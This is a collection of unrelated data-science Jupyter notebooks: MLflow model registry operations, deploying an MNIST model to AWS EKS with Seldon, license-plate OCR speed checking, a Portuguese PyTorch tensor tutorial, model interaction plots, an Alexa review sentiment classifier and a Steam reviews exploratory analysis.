model_name, version=3, stage="Staging", archive_existing_versions=True
)
```
### Loading models from stages
You can load a model in a particular stage directly from Python using the `load_model` function and the following `URI` format. Notice that for this method to success, you need to have all the libraries and dependencies already installed in the environment you are working at.
```
model = mlflow.pyfunc.load_model(f"models:/{model_name}/Staging")
```
## Editing and deleting models
Editing registered models is supported in both Mlflow and Azure ML, however, there are some differences between them that are important to notice:
### Editing models
You can edit model's description and tags from a model using Mlflow:
> Renaming models is not supported in Azure ML as model objects are immmutable.
```
client.update_model_version(
model_name, version=1, description="A heart condition classifier"
)
```
To edit tags, you have to use the method `set_model_version_tag` and `remove_model_version_tag`:
```
client.set_model_version_tag(
model_name, version="1", key="type", value="classification"
)
```
Removing a tag:
```
client.delete_model_version_tag(model_name, version="1", key="type")
```
### Deleting a model version
You can delete any model version in the registry using the MLflow client. However, Azure ML doesn't support deleting the entire model container. To achieve the same thing, you will need to delete all the model versions from a given model.
```
import mlflow
client.delete_model_version(model_name, version="2")
```
|
github_jupyter
|
# AWS Elastic Kubernetes Service (EKS) Deep MNIST
In this example we will deploy a tensorflow MNIST model in Amazon Web Services' Elastic Kubernetes Service (EKS).
This tutorial will break down in the following sections:
1) Train a tensorflow model to predict mnist locally
2) Containerise the tensorflow model with our docker utility
3) Send some data to the docker model to test it
4) Install and configure AWS tools to interact with AWS
5) Use the AWS tools to create and setup EKS cluster with Seldon
6) Push and run docker image through the AWS Container Registry
7) Test our Elastic Kubernetes deployment by sending some data
#### Let's get started! 🚀🔥
## Dependencies:
* Helm v3.0.0+
* A Kubernetes cluster running v1.13 or above (minkube / docker-for-windows work well if enough RAM)
* kubectl v1.14+
* EKS CLI v0.1.32
* AWS Cli v1.16.163
* Python 3.6+
* Python DEV requirements
## 1) Train a tensorflow model to predict mnist locally
We will load the mnist images, together with their labels, and then train a tensorflow model to predict the right labels
```
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets("MNIST_data/", one_hot = True)
import tensorflow as tf
if __name__ == '__main__':
x = tf.placeholder(tf.float32, [None,784], name="x")
W = tf.Variable(tf.zeros([784,10]))
b = tf.Variable(tf.zeros([10]))
y = tf.nn.softmax(tf.matmul(x,W) + b, name="y")
y_ = tf.placeholder(tf.float32, [None, 10])
cross_entropy = tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(y), reduction_indices=[1]))
train_step = tf.train.GradientDescentOptimizer(0.5).minimize(cross_entropy)
init = tf.initialize_all_variables()
sess = tf.Session()
sess.run(init)
for i in range(1000):
batch_xs, batch_ys = mnist.train.next_batch(100)
sess.run(train_step, feed_dict={x: batch_xs, y_: batch_ys})
correct_prediction = tf.equal(tf.argmax(y,1), tf.argmax(y_,1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
print(sess.run(accuracy, feed_dict = {x: mnist.test.images, y_:mnist.test.labels}))
saver = tf.train.Saver()
saver.save(sess, "model/deep_mnist_model")
```
## 2) Containerise the tensorflow model with our docker utility
First you need to make sure that you have added the .s2i/environment configuration file in this folder with the following content:
```
!cat .s2i/environment
```
Now we can build a docker image named "deep-mnist" with the tag 0.1
```
!s2i build . seldonio/seldon-core-s2i-python36:1.3.0-dev deep-mnist:0.1
```
## 3) Send some data to the docker model to test it
We first run the docker image we just created as a container called "mnist_predictor"
```
!docker run --name "mnist_predictor" -d --rm -p 5000:5000 deep-mnist:0.1
```
Send some random features that conform to the contract
```
import matplotlib.pyplot as plt
# This is the variable that was initialised at the beginning of the file
i = [0]
x = mnist.test.images[i]
y = mnist.test.labels[i]
plt.imshow(x.reshape((28, 28)), cmap='gray')
plt.show()
print("Expected label: ", np.sum(range(0,10) * y), ". One hot encoding: ", y)
from seldon_core.seldon_client import SeldonClient
import math
import numpy as np
# We now test the REST endpoint expecting the same result
endpoint = "0.0.0.0:5000"
batch = x
payload_type = "ndarray"
sc = SeldonClient(microservice_endpoint=endpoint)
# We use the microservice, instead of the "predict" function
client_prediction = sc.microservice(
data=batch,
method="predict",
payload_type=payload_type,
names=["tfidf"])
for proba, label in zip(client_prediction.response.data.ndarray.values[0].list_value.ListFields()[0][1], range(0,10)):
print(f"LABEL {label}:\t {proba.number_value*100:6.4f} %")
!docker rm mnist_predictor --force
```
## 4) Install and configure AWS tools to interact with AWS
First we install the awscli
```
!pip install awscli --upgrade --user
```
#### Configure aws so it can talk to your server
(if you are getting issues, make sure you have the permmissions to create clusters)
```
%%bash
# You must make sure that the access key and secret are changed
aws configure << END_OF_INPUTS
YOUR_ACCESS_KEY
YOUR_ACCESS_SECRET
us-west-2
json
END_OF_INPUTS
```
#### Install EKCTL
*IMPORTANT*: These instructions are for linux
Please follow the official installation of ekctl at: https://docs.aws.amazon.com/eks/latest/userguide/getting-started-eksctl.html
```
!curl --silent --location "https://github.com/weaveworks/eksctl/releases/download/latest_release/eksctl_$(uname -s)_amd64.tar.gz" | tar xz
!chmod 755 ./eksctl
!./eksctl version
```
## 5) Use the AWS tools to create and setup EKS cluster with Seldon
In this example we will create a cluster with 2 nodes, with a minimum of 1 and a max of 3. You can tweak this accordingly.
If you want to check the status of the deployment you can go to AWS CloudFormation or to the EKS dashboard.
It will take 10-15 minutes (so feel free to go grab a ☕).
### IMPORTANT: If you get errors in this step...
It is most probably IAM role access requirements, which requires you to discuss with your administrator.
```
%%bash
./eksctl create cluster \
--name demo-eks-cluster \
--region us-west-2 \
--nodes 2
```
### Configure local kubectl
We want to now configure our local Kubectl so we can actually reach the cluster we've just created
```
!aws eks --region us-west-2 update-kubeconfig --name demo-eks-cluster
```
And we can check if the context has been added to kubectl config (contexts are basically the different k8s cluster connections)
You should be able to see the context as "...aws:eks:eu-west-1:27...".
If it's not activated you can activate that context with kubectlt config set-context <CONTEXT_NAME>
```
!kubectl config get-contexts
```
## Setup Seldon Core
Use the setup notebook to [Setup Cluster](../../seldon_core_setup.ipynb#Setup-Cluster) with [Ambassador Ingress](../../seldon_core_setup.ipynb#Ambassador) and [Install Seldon Core](../../seldon_core_setup.ipynb#Install-Seldon-Core). Instructions [also online](./seldon_core_setup.html).
## Push docker image
In order for the EKS seldon deployment to access the image we just built, we need to push it to the Elastic Container Registry (ECR).
If you have any issues please follow the official AWS documentation: https://docs.aws.amazon.com/AmazonECR/latest/userguide/docker-basics.html
### First we create a registry
You can run the following command, and then see the result at https://us-west-2.console.aws.amazon.com/ecr/repositories?#
```
!aws ecr create-repository --repository-name seldon-repository --region us-west-2
```
### Now prepare docker image
We need to first tag the docker image before we can push it
```
%%bash
export AWS_ACCOUNT_ID=""
export AWS_REGION="us-west-2"
if [ -z "$AWS_ACCOUNT_ID" ]; then
echo "ERROR: Please provide a value for the AWS variables"
exit 1
fi
docker tag deep-mnist:0.1 "$AWS_ACCOUNT_ID.dkr.ecr.$AWS_REGION.amazonaws.com/seldon-repository"
```
### We now login to aws through docker so we can access the repository
```
!`aws ecr get-login --no-include-email --region us-west-2`
```
### And push the image
Make sure you add your AWS Account ID
```
%%bash
export AWS_ACCOUNT_ID=""
export AWS_REGION="us-west-2"
if [ -z "$AWS_ACCOUNT_ID" ]; then
echo "ERROR: Please provide a value for the AWS variables"
exit 1
fi
docker push "$AWS_ACCOUNT_ID.dkr.ecr.$AWS_REGION.amazonaws.com/seldon-repository"
```
## Running the Model
We will now run the model.
Let's first have a look at the file we'll be using to trigger the model:
```
!cat deep_mnist.json
```
Now let's trigger seldon to run the model.
We basically have a yaml file, where we want to replace the value "REPLACE_FOR_IMAGE_AND_TAG" for the image you pushed
```
%%bash
export AWS_ACCOUNT_ID=""
export AWS_REGION="us-west-2"
if [ -z "$AWS_ACCOUNT_ID" ]; then
echo "ERROR: Please provide a value for the AWS variables"
exit 1
fi
sed 's|REPLACE_FOR_IMAGE_AND_TAG|'"$AWS_ACCOUNT_ID"'.dkr.ecr.'"$AWS_REGION"'.amazonaws.com/seldon-repository|g' deep_mnist.json | kubectl apply -f -
```
And let's check that it's been created.
You should see an image called "deep-mnist-single-model...".
We'll wait until STATUS changes from "ContainerCreating" to "Running"
```
!kubectl get pods
```
## Test the model
Now we can test the model, let's first find out what is the URL that we'll have to use:
```
!kubectl get svc ambassador -o jsonpath='{.status.loadBalancer.ingress[0].hostname}'
```
We'll use a random example from our dataset
```
import matplotlib.pyplot as plt
# This is the variable that was initialised at the beginning of the file
i = [0]
x = mnist.test.images[i]
y = mnist.test.labels[i]
plt.imshow(x.reshape((28, 28)), cmap='gray')
plt.show()
print("Expected label: ", np.sum(range(0,10) * y), ". One hot encoding: ", y)
```
We can now add the URL above to send our request:
```
from seldon_core.seldon_client import SeldonClient
import math
import numpy as np
host = "a68bbac487ca611e988060247f81f4c1-707754258.us-west-2.elb.amazonaws.com"
port = "80" # Make sure you use the port above
batch = x
payload_type = "ndarray"
sc = SeldonClient(
gateway="ambassador",
ambassador_endpoint=host + ":" + port,
namespace="default",
oauth_key="oauth-key",
oauth_secret="oauth-secret")
client_prediction = sc.predict(
data=batch,
deployment_name="deep-mnist",
names=["text"],
payload_type=payload_type)
print(client_prediction)
```
### Let's visualise the probability for each label
It seems that it correctly predicted the number 7
```
for proba, label in zip(client_prediction.response.data.ndarray.values[0].list_value.ListFields()[0][1], range(0,10)):
print(f"LABEL {label}:\t {proba.number_value*100:6.4f} %")
```
|
github_jupyter
|
```
#importing libraries
import cv2
from matplotlib import pyplot as plt
import numpy as np
import imutils
import easyocr
from datetime import datetime
import mysql.connector
from csv import writer
#importing image and converting into grayscale
img = cv2.imread('image3.jpg')
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
plt.imshow(gray)
#Decting Edge
bfilter = cv2.bilateralFilter(gray, 11, 17, 17) #Noise reduction
edged = cv2.Canny(bfilter, 30, 200) #Edge detection
plt.imshow(edged)
#Finding Contours
keypoints = cv2.findContours(edged.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
contours = imutils.grab_contours(keypoints)
contours = sorted(contours, key=cv2.contourArea, reverse=True)[:10]
location = None
for contour in contours:
approx = cv2.approxPolyDP(contour, 10, True)
if len(approx) == 4:
location = approx
break
location
#Finding the location
mask = np.zeros(gray.shape, np.uint8)
new_image = cv2.drawContours(mask, [location], 0,255, -1)
new_image = cv2.bitwise_and(img, img, mask=mask)
plt.imshow(cv2.cvtColor(new_image, cv2.COLOR_BGR2RGB))
#Cropping the image and turning into grayscale
(x,y) = np.where(mask==255)
(x1, y1) = (np.min(x), np.min(y))
(x2, y2) = (np.max(x), np.max(y))
cropped_image = gray[x1:x2+1, y1:y2+1]
plt.imshow(cv2.cvtColor(cropped_image, cv2.COLOR_BGR2RGB))
#Using OCR
reader = easyocr.Reader(['en'])
result = reader.readtext(cropped_image)
result
#Results
text2=""
if len(result)>1:
text = result[0][-2]+" "+result[1][-2]
else:
text = result[0][-2]
for i in text:
if i=="," or i=="." or i.isspace():
i=""
text2+=i
text2 = text2.upper()
print(text2)
#Searching in database
db2 = mysql.connector.connect(host="localhost",user="root",passwd="root",database="iip")
mycursor2 = db2.cursor()
mycursor2.execute("SELECT numberplate, time FROM vehicle WHERE numberplate = %s",(text2,))
myresult = mycursor2.fetchall()
row_count = mycursor2.rowcount
print ("number of affected rows: {}".format(row_count))
if row_count == 0:
print ("It Does Not Exist")
else:
tme=myresult[0][1]
date_from_sql = tme.strftime('%H:%M:%S')
date_from_sql = datetime.strptime(date_from_sql, '%H:%M:%S')
now = datetime.now()
formatted_date = now.strftime('%H:%M:%S')
formatted_date = datetime.strptime(formatted_date, '%H:%M:%S')
delta = formatted_date - date_from_sql
diff=delta.seconds
print(diff)
#Adding to CSV file
max_speed = 30 #in Km/h
distance = 1 #in Km
avg_spd = distance/(diff/3600)
print(avg_spd)
if(max_speed < avg_spd):
print("The average speed of car is higher than max speed")
ls = [myresult[0][0], avg_spd]
with open('car.csv', 'a') as f_object:
writer_object = writer(f_object)
writer_object.writerow(ls)
f_object.close()
```
|
github_jupyter
|
# Matrizes, Arrays, Tensores
## Referências
- Documentação oficial de Tensores do PyTorch
http://pytorch.org/docs/master/tensors.html
- PyTorch para usuários NumPy:
https://github.com/torch/torch7/wiki/Torch-for-Numpy-users
## NumPy array
```
import numpy as np
a = np.array([[2., 8., 3.],
[0.,-1., 5.]])
a
a.shape
a.dtype
```
## PyTorch tensor
Os tensores do PyTorch só podem ser float, float32 ou float64
```
import torch
```
### Convertendo NumPy array para tensor PyTorch
```
b = torch.Tensor(np.zeros((3,4)))
b
```
### Criando arrays e tensores constantes
```
c = np.ones((2,4)); c
d = torch.ones((2,4)); d
```
### Criando arrays e tensores aleatórios
```
e = np.random.rand(2,4); e
f = torch.rand(2,4); f
```
### Arrays aleatórios com semente, para reproduzir mesma sequência pseudoaleatória
```
np.random.seed(1234)
e = np.random.rand(2,4);e
torch.manual_seed(1234)
f = torch.rand(2,4); f
```
### Torch seed is different for GPU
```
if torch.cuda.is_available():
torch.cuda.torch.manual_seed(1234)
g = torch.cuda.torch.rand(2,4)
print(g)
```
## Conversões entre NumPy e Tensores PyTorch
### NumPy para Tensor PyTorch utilizando `.from_numpy()` - CUIDADO
Não são todos os tipos de elementos do array NumPy que podem ser convertidos
para tensores PyTorch. Abaixo é um programa que cria uma tabela de equivalencias
entre os tipos do NumPy e os tipos do Tensor PyTorch:
```
import pandas as pd
dtypes = [np.uint8, np.int32, np.int64, np.float32, np.float64, np.double]
table = np.empty((2, len(dtypes)),dtype=np.object)
for i,t in enumerate(dtypes):
a = np.array([1],dtype=t)
ta = torch.from_numpy(a)
table[0,i] = a.dtype.name
table[1,i] = type(ta).__name__
pd.DataFrame(table)
```
### NumPy para Tensor utilizando `torch.FloatTensor()` - método recomendado
Existe uma cuidado importante a ser tomado na transformação de matrizes do NumPy para tensores PyTorch pois as funções de rede neurais do PyTorch utilizam o tipo FloatTensor e o NumPy utiliza como default o tipo float64, o que faz uma conversão automática para DoubleTensor do PyTorch e consequentemente gerando um erro.
A recomendação é utilizar o `torch.FloatTensor` para converter NumPy para tensores PyTorch:
```
a = np.ones((2,5))
a_t = torch.FloatTensor(a)
a_t
```
### Tensor PyTorch para array NumPy
```
ta = torch.ones(2,3)
ta
a = ta.numpy()
a
```
## Tensor na CPU e na GPU
```
ta_cpu = torch.ones(2,3); ta_cpu
if torch.cuda.is_available():
ta_gpu = ta_cpu.cuda()
print(ta_gpu)
```
## Operações em tensores
### criação de tensor e visualização do seu shape
```
a = torch.eye(4); a
a.size()
```
### Reshape é feito com `view` em PyTorch
```
b = a.view(2,8); b
```
Aqui é um exemplo criando um tensor unidimensional sequencial de 0 a 23 e em seguida uma reshape para
que o tensor fique com 4 linhas e 6 colunas
```
a = torch.arange(0,24).view(4,6);a
```
### Adição elemento por elemento
#### usando operadores
```
c = a + a; c
d = a - c ; d
```
#### forma funcional
```
d = a.sub(c); d
```
#### Operação in-place
```
a.sub_(c); a
```
### Multiplicação elemento por elemento
```
d = a * c; d
d = a.mul(c); d
a.mul_(c); a
```
### Média em tensores
```
a = torch.arange(0,24).view(4,6); a
u = a.mean(); u
uu = a.sum()/a.nelement(); uu
```
### Média com redução de eixo
```
u_row = a.mean(dim=1); u_row
u_col = a.mean(dim=0); u_col
```
### Desvio padrão
```
std = a.std(); std
std_row = a.std(dim=1); std_row
```
## Comparação speedup CPU e GPU
```
a_numpy_cpu = np.ones((1000,1000))
%timeit b = 2 * a_numpy_cpu
a_torch_cpu = torch.ones(1000,1000)
%timeit b = 2 * a_torch_cpu
if torch.cuda.is_available():
a_torch_gpu = a_torch_cpu.cuda()
%timeit b = 2 * a_torch_gpu
```
Rodando o código abaixo na GTX1080: speedup de 15,5
- 888 µs ± 43.4 ns per loop (mean ± std. dev. of 7 runs, 1000 loops each)
- 57.1 µs ± 22.7 ns per loop (mean ± std. dev. of 7 runs, 10000 loops each)
Rodando no macbook:
- numpy: 1000 loops, best of 3: 449 µs per loop
- torch: 1000 loops, best of 3: 1.6 ms per loop
```
%timeit b1 = a_numpy_cpu.mean()
%timeit b2 = a_torch_cpu.mean()
if torch.cuda.is_available():
%timeit c = a_torch_gpu.mean()
```
|
github_jupyter
|
```
import sys
sys.path.append('../transformers/')
import tensorflow as tf
import tensorflow_datasets as tfds
import numpy as np
import matplotlib.pyplot as plt
import matplotlib as mpl
import pickle
from tqdm import tqdm
from path_explain import utils
from plot.text import text_plot, matrix_interaction_plot, bar_interaction_plot
from model import cnn_model
from embedding_explainer import EmbeddingExplainerTF
utils.set_up_environment(visible_devices='3')
encoder = tfds.features.text.TokenTextEncoder.load_from_file('encoder')
model = tf.keras.models.load_model('model.h5')
interpret_model = cnn_model(encoder.vocab_size, for_interpretation=True)
interpret_model.load_weights('model.h5', by_name=True)
sentences = [
'This movie was bad',
'This movie was not bad',
'A movie',
'A bad movie',
'A bad, terrible movie',
'A bad, terrible, awful movie',
'A bad, terrible, awful, horrible movie'
]
ids_list = []
for sentence in sentences:
ids = encoder.encode(sentence)
ids = np.array(ids)
ids = np.pad(ids, pad_width=(0, max(0, 52 - len(ids))))
ids_list.append(ids)
ids_list = np.stack(ids_list, axis=0)
model(ids_list)
embedding_model = tf.keras.models.Model(model.input, model.layers[1].output)
embeddings = embedding_model(ids_list)
baseline_embedding = embedding_model(np.zeros((1, 52), dtype=np.float32))
explainer = EmbeddingExplainerTF(interpret_model)
attributions = explainer.attributions(inputs=embeddings,
baseline=baseline_embedding,
batch_size=128,
num_samples=256,
use_expectation=False,
output_indices=0,
verbose=True)
interactions = explainer.interactions(inputs=embeddings,
baseline=baseline_embedding,
batch_size=128,
num_samples=256,
use_expectation=False,
output_indices=0,
verbose=True)
encoder.decode(ids_list[i]).split(' ')
i = 1
text_plot('this movie was not bad'.split(' '), attributions[i], include_legend=True)
plt.savefig('movie_not_bad_cnn_text.pdf')
i = 1
matrix_interaction_plot(interactions[i, ids_list[i] != 0][:, :5], encoder.decode(ids_list[i]).split(' '))
plt.savefig('not_bad_cnn_matrix.pdf')
plot_all(0)
plot_all(1)
plot_all(2)
plot_all(3)
plot_all(4)
plot_all(5)
plot_all(6)
```
|
github_jupyter
|
```
# import packages
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import re
import nltk
from nltk.corpus import stopwords
from nltk.stem.porter import PorterStemmer
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.model_selection import train_test_split
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import accuracy_score, precision_score, recall_score, confusion_matrix, f1_score
from imblearn.over_sampling import SMOTE
import warnings
warnings.filterwarnings("ignore")
```
### Load the dataset
- Load the train data and using all your knowledge try to explore the different statistical properties of the dataset.
```
# Code starts here
# load data
df = pd.read_csv("train.csv")
# Converting date attribute from string to datetime.date datatype
df['date'] = pd.to_datetime(df['date'])
# # calculate the total length of word
df['length'] = df['verified_reviews'].apply(len)
df.head()
# # Code ends here
```
### Visualize and Preprocess the data
- Visualize the different features of your interest
- Retaining only alphabets (Using regular expressions)
- Removing stopwords (Using nltk library)
```
## Rating vs feedback
# set figure size
plt.figure(figsize=(15,7))
# generate countplot
sns.countplot(x="rating", hue="feedback", data=df)
# display plot
plt.show()
## Product rating vs feedback
# set figure size
plt.figure(figsize=(15,7))
# generate barplot
sns.barplot(x="rating", y="variation", hue="feedback", data=df, ci = None)
# display plot
plt.show()
# import packages
import re
import nltk
from nltk.corpus import stopwords
from nltk.stem.porter import PorterStemmer
# declare empty list 'corpus'
corpus=[]
# for loop to fill in corpus
for i in range(0,2520):
# retain alphabets
review = re.sub('[^a-zA-Z]', ' ', df['verified_reviews'][i] )
# convert to lower case
review=review.lower()
# tokenize
review=review.split()
# initialize stemmer object
ps=PorterStemmer()
# perform stemming
review=[ps.stem(word) for word in review if not word in set(stopwords.words('english'))]
# join elements of list
review=' '.join(review)
# add to 'corpus'
corpus.append(review)
```
### Model building
- Now let's come to the actual task, using any classifier, predict the `feedback`. Use different techniques you have learned to imporove the performance of the model.
- Try improving upon the `accuracy_score` ([Precision Score](https://scikit-learn.org/stable/modules/generated/sklearn.metrics.precision_score.html))
```
# import libraries
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.model_selection import train_test_split
# Instantiate count vectorizer
cv = CountVectorizer(max_features=1500)
# Independent variable
X = cv.fit_transform(corpus).toarray()
# dependent variable
y = df['feedback']
# Counts
count = y.value_counts()
print(count)
# Split the dataset
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.20, random_state = 0)
# import packages
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import accuracy_score, precision_score, recall_score, confusion_matrix, f1_score
# Instantiate calssifier
rf = RandomForestClassifier(random_state=2)
# fit model on training data
rf.fit(X_train, y_train)
# predict on test data
y_pred = rf.predict(X_test)
# calculate the accuracy score
score = accuracy_score(y_test, y_pred)
# calculate the precision
precision = precision_score(y_test, y_pred)
# display 'score' and 'precision'
print(score, precision)
# import packages
from imblearn.over_sampling import SMOTE
# Instantiate smote
smote = SMOTE(random_state=9)
# fit_sample onm training data
X_train, y_train = smote.fit_sample(X_train, y_train)
# fit modelk on training data
rf.fit(X_train, y_train)
# predict on test data
y_pred = rf.predict(X_test)
# calculate the accuracy score
score = accuracy_score(y_test, y_pred)
# calculate the precision
precision = precision_score(y_test, y_pred)
# display precision and score
print(score, precision)
```
### Prediction on the test data and creating the sample submission file.
- Load the test data and store the `Id` column in a separate variable.
- Perform the same operations on the test data that you have performed on the train data.
- Create the submission file as a `csv` file consisting of the `Id` column from the test data and your prediction as the second column.
```
# Code Starts here
# Prediction on test data
# Read the test data
test = pd.read_csv('test.csv')
# Storing the id from the test file
id_ = test['Id']
# Apply the transformations on test
# Converting date attribute from string to datetime.date datatype
test['date'] = pd.to_datetime(test['date'])
# calculate the total length of word
test['length'] = test['verified_reviews'].apply(len)
# declare empty list 'corpus'
corpus=[]
# for loop to fill in corpus
for i in range(0,630):
# retain alphabets
review = re.sub('[^a-zA-Z]', ' ', test['verified_reviews'][i] )
# convert to lower case
review=review.lower()
# tokenize
review=review.split()
# initialize stemmer object
ps=PorterStemmer()
# perform stemming
review=[ps.stem(word) for word in review if not word in set(stopwords.words('english'))]
# join elements of list
review=' '.join(review)
# add to 'corpus'
corpus.append(review)
test = cv.transform(corpus).toarray()
# predict on test data
y_pred_test = rf.predict(test)
y_pred_test = y_pred_test.flatten()
# Create a sample submission file
sample_submission = pd.DataFrame({'Id':id_,'feedback':y_pred_test})
print(sample_submission.head())
# Convert the sample submission file into a csv file
sample_submission.to_csv('sample_submission_test.csv',index=False)
# Code ends here
```
|
github_jupyter
|
```
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
import math
import seaborn as sns
from datetime import datetime
from functools import reduce
from collections import Counter
import functions
from scipy.stats import ks_2samp
from scipy.stats import pearsonr
import statsmodels.api as sm
import statsmodels.formula.api as smf
pd.options.mode.chained_assignment = None
```
# Load the dataset
we load our dataset and using the function **parsedate** we have changed the format of our timestamp
```
dataset = pd.read_csv('steam_reviews.csv',
index_col=0,
parse_dates=['timestamp_created', 'timestamp_updated', 'author.last_played'],
date_parser=functions.parsedate)
dataset.head(20)
dataset.columns
dataset.shape
dataset.info()
```
# RQ1
### Exploratory Data Analysis (EDA)
To try to better understand our dataset we have made a bunch of plots and tables in which we have tried to catch some information about these reviews received for the applications in Steam.
```
dataset.describe()
```
#### Application more reviewed:
To start our analysis we have made a pie chart about applications more reviewed. In particular we have decided to pick the first thirty games more reviewed and understand how the number of rewiews is splitted between them. Indeed the percentage written in the slices of the pie plot is referred not to the total number of reviews but the to the sum of reviews written for these thirty more popular games. The choice of thirty is due to make cleaner the plot and because we are interested only in the more popular games. The most talked-about.
```
a = pd.Series(dataset.groupby("app_name").app_id.count().sort_values(ascending=False).head(30))
plt.rcParams['figure.figsize'] = (10, 10)
plt.pie(a,
labels = a.index,
explode = [0.1 for value in range(0, a.index.nunique())],
shadow = True, autopct = '%.1f%%')
plt.title('Application name', fontsize = 20)
plt.axis('off')
plt.show()
```
#### Correlation matrix:
Then we have tried to make a correlation matrix to understand if there are some variables correlated between them
```
fig, ax = plt.subplots(figsize=(13,13))
sns.heatmap(dataset.corr(), cbar=True, annot = True, cmap='BrBG', linewidths=.3,fmt='.1g')
```
We have noticed that there was not any particular correlation between columns except for the ones related to time played by the player therefore we have decided to see in depth these correlations to have clearer information about them.
```
df = pd.DataFrame(dataset,columns=['author.playtime_forever','author.playtime_last_two_weeks',\
'author.playtime_at_review'])
corrMatrix = df.corr()
sns.heatmap(corrMatrix, annot=True)
plt.show()
```
#### Time and Language:
At this point we want to extract some information about the language of the reviews and time when they were written. We have divided the day in three parts: morning (8am-2pm), afternoon (2pm-10pm) and night (10pm-8am).
So for each part of the day we have grouped the reviews by language, counted them and picked the ten languages more popular.
In this way in our final barplot for each popular language we have the number of reviews written in each part of the day. We have also made a table to explain better the number obtained.
```
arr_1 = dataset['timestamp_created'].dt.time
time_1 = [datetime.strptime('08:00:00', '%H:%M:%S').time(),
datetime.strptime('13:59:59', '%H:%M:%S').time()]
index_1 = [x for x in arr_1.index if (time_1[0] <= arr_1[x] <= time_1[1])]
time_2 = [datetime.strptime('14:00:00', '%H:%M:%S').time(),
datetime.strptime('21:59:59', '%H:%M:%S').time()]
index_2 = [x for x in arr_1.index if (time_2[0] <= arr_1[x] <= time_2[1])]
time_3 = [datetime.strptime('22:00:00', '%H:%M:%S').time(),
datetime.strptime('23:59:59', '%H:%M:%S').time(),
datetime.strptime('00:00:00', '%H:%M:%S').time(),
datetime.strptime('07:59:59', '%H:%M:%S').time()]
index_3 = [x for x in arr_1.index
if ((time_3[0] <= arr_1[x] <= time_3[1]) or
(time_3[2] <= arr_1[x] <= time_3[3]))]
# counting occurrences in the languages
mat1 = Counter((dataset['language'][index_1]).tolist())
pom1 = Counter((dataset['language'][index_2]).tolist())
not1 = Counter((dataset['language'][index_3]).tolist())
# sorting the occurrences
mat2 = {k: v for k, v in sorted(mat1.items(), key=lambda item: item[1], reverse=True)}
pom2 = {k: v for k, v in sorted(pom1.items(), key=lambda item: item[1], reverse=True)}
not2 = {k: v for k, v in sorted(not1.items(), key=lambda item: item[1], reverse=True)}
# taking only the first 10 languages, that happens to be the same for every time slot
mattina = list(mat2.items())[:10]
pomeriggio = list(pom2.items())[:10]
notte = list(not2.items())[:10]
# creating an empty dataframe with timeslots as cols and languages as indexes
df = pd.DataFrame(index=list(mat2.keys())[:10], columns=['8am-2pm', '2pm-10pm', '10pm-8am'])
# adding the values in the dataframe
for (couple1, couple2, couple3) in zip(mattina, pomeriggio, notte):
df['8am-2pm'][couple1[0]] = couple1[1]
df['2pm-10pm'][couple2[0]] = couple2[1]
df['10pm-8am'][couple3[0]] = couple3[1]
df.index.name = 'language'
df
ax = df.plot(y=["8am-2pm", "2pm-10pm", "10pm-8am"], kind="bar")
ax.set_yscale('log')
ax.set_xlabel('languages')
ax.set_ylabel("number reviews")
```
In this stacked barplot we can see that the majority of the reviews are written during the afternoon while during the night fewer people usually write on Steam. The language more used as expected is English
#### Viral Comments:
In this table we have wanted to look at the ten reviews which have received more comments because we have thought that it could be interesting look at them to understand which comments are popular on Steam.
```
dataset_7 = dataset.sort_values(by=['comment_count'], ascending = False)
dataset_7 = dataset_7.reset_index()
dataset_7[["author.steamid", "language", "app_name", "review", "comment_count"]].head(10)
```
Unfortunately the majority of them are written not in english!
#### Games more played:
In our dataset there is a column in which is stored the time played by that player to that particular game. So we have decided to explore what are the games more played in terms of hours. We have decided to pick the top 20 games because we have thought that 20 is a good trade-off between a clear plot and a meaningful number of games.
```
#dataset_8 = dataset_8[["author.steamid", "author.playtime_forever","app_name"]]
dataset_8 = pd.Series(dataset.groupby("app_name")["author.playtime_forever"].sum().sort_values(ascending=False))
ore_di_gioco = dataset_8.values
giochi = dataset_8.index
plt.figure(figsize = ((15, 8)))
sns.barplot(x = ore_di_gioco[:20],
y = giochi[:20], orient = 'h')
plt.title('TOP 20 games more played in terms of hours', size = 20)
plt.ylabel('Games', size = 14, style = 'italic')
plt.xlabel('Number of hours', size = 14, style = 'italic')
#plt.xscale('log')
plt.xticks(np.arange(1000000000,60000000000,2000000000))
plt.show()
```
In this barplot we have found some confirms: the games more played are also often the games more reviewed that were appeared in the pie chart.
#### Active players:
To conclude this first analysis we have tried to understand what are the players more useful for Steam: we have selected the ten authors that have written the most number of helpful and funny reviews.
```
dataset_9 = pd.Series(dataset[(dataset.votes_helpful > 0)].groupby("author.steamid").votes_helpful.count().sort_values(ascending=False))
dataset_10 = pd.Series(dataset[(dataset.votes_funny > 0)].groupby("author.steamid").votes_funny.count().sort_values(ascending=False))
pd.concat([dataset_9[:11], dataset_10[:11]], axis=1).reset_index().fillna(0).sort_values(by=['votes_helpful'],ascending=False).reset_index(drop = True)
```
It's interesting to see that the authors who have written some funny reviews have also written helpful reviews.
#### Languages and subplots
```
print("The total number of languages used to write reviews is ",'\033[1m' +str(len(dataset["language"].unique())) +'\033[0m')
```
Making a subplot we have been able to visualize all the present languages in the dataset and counting the number of reviews. The two subplots have different measure in y-scales!
```
fig=plt.figure(figsize=(25,18))
ax1=fig.add_subplot(2,1,1)
dataset['language'].value_counts().head(10).plot.bar(figsize = (18, 10),title='Top 10 Languages',xlabel='Language',ylabel='Number of Reviews', ax = ax1,rot=0, logy = True, color = "orange")
ax2=fig.add_subplot(2,1,2)
dataset['language'].value_counts().iloc[-18:].plot.bar(figsize = (18, 10),title='Other 18 Languages',xlabel='Language',ylabel='Number of Reviews', ax = ax2,rot=0, color = "orchid")
fig.tight_layout();
#dataset['language'].value_counts().plot.bar(figsize = (18, 7),title='Top Languages',xlabel='Language',ylabel='Number of Reviews', ax = ax1)
```
# RQ2
### Plot the number of reviews for each application in descending order.
